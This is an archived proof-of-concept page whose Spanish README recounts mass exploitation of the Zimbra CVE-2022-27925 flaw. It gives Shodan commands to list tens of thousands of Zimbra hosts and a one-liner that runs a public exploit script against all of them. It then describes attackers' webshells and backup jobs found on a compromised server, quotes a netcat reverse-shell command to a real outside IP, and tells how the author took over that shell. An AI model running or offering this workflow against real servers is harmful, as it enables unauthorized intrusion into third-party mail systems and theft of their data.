POC详情: eedc871878a47d4c04103c8b9177fb1e46222b09

来源
关联漏洞
标题: Zimbra Collaboration Suite 路径遍历漏洞 (CVE-2022-27925)
描述:Zimbra Collaboration Suite(ZCS)是美国Zimbra的一款开源协同办公套件。该产品包括WebMail、日历、通信录等。 Zimbra Collaboration Suite 8.8.15 和 9.0 存在路径遍历漏洞,具有管理员权限的经过身份验证的用户能够将任意文件上传到系统,从而导致目录遍历。
描述
CVE-2022-27925
介绍
# Explotación Activa Sobre  Zimbra CVE-2022-37042 (RCE Unauthenticated)

La siguiente investigación inicio tratando de entender las POC de varios repositorios en GitHub que compartieron muchos investigadores y termino en una sorpresa interesante, que compartiré en los siguientes parrafos. El 10 de agosto del presente año el grupo de investigación de seguridad Volexity publica en su cuenta de [twitter](https://twitter.com/Volexity/status/1557449272379031553) el descubrimiento de la explotación en masa de la suite de ZCS (Zimbra Collaboration Server) que permitir un bypass de la autenticación y que cerca de 1000 instancias de Zimbra se encontraban comprometidas a nivel mundial. 

En la investigación presentada por los colegas de [Volexity](https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/) mostraban parte de los logs consultados 

```
[attacker_ip] - - [30/Jun/2022:05:33:18 +0000] "POST [snipped]/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=true HTTP/1.0" 401 299 "[snipped]" "Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0" 7
```

 De igual manera explicaban la falla del código se debía a la función **doPost**,

![](img/imagen1.png)

El problema con este código es que se verifica la autenticación y se establece un mensaje de error, pero no hay una declaración de devolución. Esto significa que el código subsiguiente seguirá ejecutándose, independientemente del estado de autenticación del usuario. Siguiendo la función hacia abajo, un atacante solo necesita establecer los parámetros correctos en la URL para explotar la vulnerabilidad.

Una vez entendemos las posibles causas y ya habían salido algunos POCs, procedemos a realizar la explotación paso a paso, pero primero indagaremos sobre el estado utilizando la herramienta [greynoise](https://viz.greynoise.io/)

![](img/imagen2.png)

Observamos que a más de un mes de publicada el CVE-2022-27925 siguen realizando ataques

En shodan podemos observar alrededor de 45,223 instalaciones de Zimbra

![](img/imagen3.png)



### Requisitos

1. [VPS de Preferencia Ubuntu Server 20.04](https://www.vultr.com/?ref=8403796-6G)
2. Una cuenta de Shodan configurada para usar la CLI y su API
3. Tener **docker** instalado 
4. Instalar **jq** 



### POC

1. Enumeración de posibles targets

`shodan download --limit -1 zimbra.json.gz http.favicon.hash:"1624375939"`

![](img/imagen4.png)

Vamos a pasear los resultados

`shodan parse --fields ip_str,port --separator , zimbra.json.gz > zimbra.txt`

![](img/imagen5.png)

Vamos a revisar un poco los datos y darle el formato necesario para automatizar las pruebas

<img src="img/imagen6.png" style="zoom:60%;" />

Parseamos los datos para poder utilizar un online

![](img/imagen7.png)



Utilizaremos httpx en docker

![](img/imagen8.png)

Descargamos la POC de GitHub 

`git clone https://github.com/vnhacker1337/CVE-2022-27925-PoC`

![](img/imagen9.png)

Probamos el oneliner con la Poc, es importante destacar que debemos mover el archivo parseado al directorio de la poc o llamarlo por la ruta absoluta, también utilizando el dump de shodan podemos utilizarlo

```
cat zimbra.json | jq -r '.hostnames[]' | docker run -i projectdiscovery/httpx -silent | xargs -I@ sh -c 'python3 zimbra-exploit.py @ 313.zip' | egrep -v '404|401|405|200'
```

![](img/imagen10.png)

Durante esta prueba muchos targets ya aparecen parchados



Finalmente obtuvimos un resultado

![](img/imagen11.png)

![](img/imagen12.png)

2. APT, botnets  y ransomware

Una vez explotada la vulnerabilidad observamos archivos que son scripts de **APT** para realizar la exfiltración de la información y la preparación del chantaje 

![](img/imagen13.png)



archivo malicio **gift**

![](img/imagen14.png)

Archivo de respaldo y exfiltración

  <img src="img/imagen15.jpeg" style="zoom:20%;" />

Una de las rutas que encontramos contenía multiples webshells

`/opt/zimbra/jetty_base/webapps/zimbraAdmin/`

![](img/imagen16.png)

Un análisis de los procesos en ejecución demostró que se estaban instalando cronjobs para empaquetar los correos

![](img/imagen17.jpeg)

**Nota:** lo siguiente fue realizado con fines educativos y a manera de realizar una buena acción



3. Toma de la shell instaladas por los APT

Una vez identificado la descarga de netcat procedimos a tomar la sesión de los atacantes, se observa el uso de netcat **`./nc 52.90.92.82 443 -e /bin/bash`**

<img src="img/imagen18.jpeg" alt="imagen18" style="zoom:20%;" />

<img src="img/imagen19.jpeg" alt="imagen19" style="zoom:25%;" />



Una vulnerabilidad reporta públicamente hace más de 30 días sigue estando vigente al momento de redactar este articulo, cabe destacar que se notificaron a los afectados sin éxito dado que sigue activa la vulnerabilidad. 
文件快照

[4.0K] /data/pocs/eedc871878a47d4c04103c8b9177fb1e46222b09 ├── [4.0K] img │   ├── [239K] Captura de Pantalla 2022-09-22 a la(s) 11.53.04 p. m..png │   ├── [306K] imagen10.png │   ├── [ 33K] imagen11.png │   ├── [135K] imagen12.png │   ├── [5.2K] imagen13.png │   ├── [ 70K] imagen14.png │   ├── [1.9M] imagen15.jpeg │   ├── [ 91K] imagen16.png │   ├── [1.9M] imagen17.jpeg │   ├── [1.5M] imagen18.jpeg │   ├── [320K] imagen19.jpeg │   ├── [ 12K] imagen1.png │   ├── [ 83K] imagen2.png │   ├── [365K] imagen3.png │   ├── [ 56K] imagen4.png │   ├── [ 13K] imagen5.png │   ├── [139K] imagen6.png │   ├── [ 31K] imagen7.png │   ├── [113K] imagen8.png │   └── [110K] imagen9.png └── [4.7K] README.md 1 directory, 21 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。